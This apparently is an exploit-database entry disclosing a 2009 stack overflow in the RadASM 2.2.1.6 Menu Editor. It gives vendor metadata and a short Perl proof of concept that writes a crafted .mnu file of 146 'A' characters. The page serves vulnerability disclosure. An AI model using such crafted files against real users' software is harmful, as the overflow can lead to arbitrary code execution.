header-logo
Suggest Exploit
vendor:
RadASM 2.2.1.6 Menu Editor
by:
Pankaj Kohli
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: RadASM 2.2.1.6 Menu Editor
Affected Version From: 2.2.1.6
Affected Version To: 2.2.1.6
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC

RadASM 2.2.1.6 Menu Editor is vulnerable to a stack overflow vulnerability when a specially crafted .mnu file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .mnu file.

Mitigation:

Update to the latest version of RadASM 2.2.1.6 Menu Editor.
Source

Exploit-DB raw data:

# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC
# Coded by Pankaj Kohli
# http://www.pank4j.com
 
$str="A"x146;
$file="sploit.mnu";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";

# milw0rm.com [2009-08-04]